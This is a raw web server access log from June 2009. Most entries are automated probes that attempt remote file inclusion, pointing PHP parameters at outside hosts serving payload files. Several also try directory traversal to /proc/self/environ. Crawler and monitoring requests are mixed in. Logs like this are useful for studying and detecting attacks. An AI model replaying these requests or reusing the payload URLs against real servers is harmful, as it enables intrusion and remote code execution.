199.120.90.222 - - [16/Jun/2009:02:13:19 -0400] "GET /logs/access_log.Q109060400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:13:22 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:13:23 -0400] "GET /logs/access_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:13:23 -0400] "GET /logs/access_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:13:30 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:13:36 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:14:00 -0400] "GET /logs/access_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
63.87.133.199 - - [16/Jun/2009:02:14:10 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
209.59.12.99 - - [16/Jun/2009:02:14:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.240.235.130 - - [16/Jun/2009:02:14:12 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:14:14 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:14:14 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:14:49 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
38.99.44.103 - - [16/Jun/2009:02:15:02 -0400] "GET /logs/access_log.Q108101000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.54.32.201 - - [16/Jun/2009:02:15:27 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:02:15:27 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:02:15:27 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:02:15:27 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.6.17.151 - - [16/Jun/2009:02:15:46 -0400] "GET /logs/access_log.Q108050500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
98.116.62.213 - - [16/Jun/2009:02:16:25 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jun/2009:02:16:25 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jun/2009:02:16:26 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:02:16:27 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:02:16:27 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:02:16:27 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:02:16:27 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.240.235.130 - - [16/Jun/2009:02:16:39 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
66.249.71.54 - - [16/Jun/2009:02:16:40 -0400] "GET /images/buy_button_over.gif HTTP/1.1" 200 959 "-" "Googlebot-Image/1.0"
77.240.235.130 - - [16/Jun/2009:02:16:47 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
84.201.208.50 - - [16/Jun/2009:02:16:54 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:02:16:54 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:02:16:55 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:02:16:59 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
60.251.217.4 - - [16/Jun/2009:02:17:14 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
60.251.217.4 - - [16/Jun/2009:02:17:15 -0400] "GET /?sourcedir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:02:17:15 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:02:17:15 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
60.251.217.4 - - [16/Jun/2009:02:17:19 -0400] "GET /logs/?sourcedir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 200 5706 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:17:45 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:17:45 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:17:45 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:02:17:48 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:02:17:48 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:17:55 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:02:18:00 -0400] "GET /logs/access_log.Q108072000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.175.71.121 - - [16/Jun/2009:02:18:40 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:18:40 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:18:40 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.98.59.178 - - [16/Jun/2009:02:18:41 -0400] "GET /index.php?option=com_weblinks&task=§ionid=&id=&mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/yuo.txt? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.98.59.178 - - [16/Jun/2009:02:18:41 -0400] "GET /logs/index.php?option=com_weblinks&task=§ionid=&id=&mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/yuo.txt? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
81.175.71.121 - - [16/Jun/2009:02:18:50 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:02:18:57 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:02:18:57 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:02:19:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.240.235.130 - - [16/Jun/2009:02:19:35 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
38.99.44.103 - - [16/Jun/2009:02:20:32 -0400] "GET /logs/error_log.Q108062400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.116.62.213 - - [16/Jun/2009:02:20:56 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:21:18 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:02:22:16 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:02:22:46 -0400] "GET /images/_notes/download_cat_BBF04.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.116.62.213 - - [16/Jun/2009:02:22:53 -0400] "GET /logs/access_log.Q109050900%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:02:24:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.105.207.244 - - [16/Jun/2009:02:24:56 -0400] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:02:24:56 -0400] "GET /logs/access_log.Q109052400//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:02:24:56 -0400] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.240.235.130 - - [16/Jun/2009:02:27:17 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:27:17 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:27:17 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
66.98.166.76 - - [16/Jun/2009:02:27:22 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:02:27:22 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:02:27:23 -0400] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:02:28:16 -0400] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:02:28:17 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:02:28:17 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:02:29:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.240.235.130 - - [16/Jun/2009:02:29:16 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:29:16 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:29:16 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
63.147.72.145 - - [16/Jun/2009:02:29:22 -0400] "GET /logs/error_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:02:29:33 -0400] "GET /logs/error_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:02:29:48 -0400] "GET /logs/access_log.Q108022900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [16/Jun/2009:02:29:59 -0400] "GET /logs///?_zb_path=http://aboutav.com//back/test.txt? HTTP/1.1" 200 5712 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
218.249.36.194 - - [16/Jun/2009:02:29:59 -0400] "GET ///?_zb_path=http://aboutav.com//back/test.txt? HTTP/1.1" 200 453 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.105.207.244 - - [16/Jun/2009:02:30:27 -0400] "GET /logs/access_log.Q109052400%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:02:31:30 -0400] "GET /logs/access_log.Q109052900%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:02:31:53 -0400] "GET /logs/error_log.Q108050800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
77.240.235.130 - - [16/Jun/2009:02:32:30 -0400] "GET /logs/access_log.Q109060900//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
66.98.166.76 - - [16/Jun/2009:02:32:58 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:02:33:01 -0400] "GET /logs/access_log.Q107060400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.98.166.76 - - [16/Jun/2009:02:33:16 -0400] "GET /logs/error_log.Q109051700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:02:33:30 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:02:33:43 -0400] "GET /logs/error_log.Q109051700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:02:34:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.240.235.130 - - [16/Jun/2009:02:34:31 -0400] "GET /logs/access_log.Q109060900//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
38.99.13.118 - - [16/Jun/2009:02:35:08 -0400] "GET /logs/access_log.Q108062900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.44.103 - - [16/Jun/2009:02:35:45 -0400] "GET /logs/access_log.Q108021900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.176.230.136 - - [16/Jun/2009:02:35:48 -0400] "GET //[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:02:35:48 -0400] "GET /logs//[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:02:35:48 -0400] "GET /logs/access_log.Q109051700%20%20//[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 252 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 252 "-" "XXXXXX"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "XXXXXX"
207.210.89.18 - - [16/Jun/2009:02:36:16 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "XXXXXX"
110.45.146.88 - - [16/Jun/2009:02:36:24 -0400] "GET /logs/access_log.Q109052300/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:25 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:25 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:28 -0400] "GET /logs/access_log.Q109052300/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:29 -0400] "GET /index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:29 -0400] "GET /logs/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:36 -0400] "GET /logs/access_log.Q109052300/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:36 -0400] "GET /index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:36 -0400] "GET /logs/access_log.Q109060900/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:37 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:39 -0400] "GET /logs/access_log.Q109060900/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
110.45.146.88 - - [16/Jun/2009:02:36:52 -0400] "GET /logs/access_log.Q109060900/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
81.176.230.136 - - [16/Jun/2009:02:37:14 -0400] "GET /logs/error_log.Q109051700%20%20//[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
118.69.124.55 - - [16/Jun/2009:02:37:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
118.69.124.55 - - [16/Jun/2009:02:37:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
118.69.124.55 - - [16/Jun/2009:02:37:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
118.69.124.55 - - [16/Jun/2009:02:37:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
110.45.146.146 - - [16/Jun/2009:02:37:38 -0400] "GET /logs/access_log.Q109052300/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
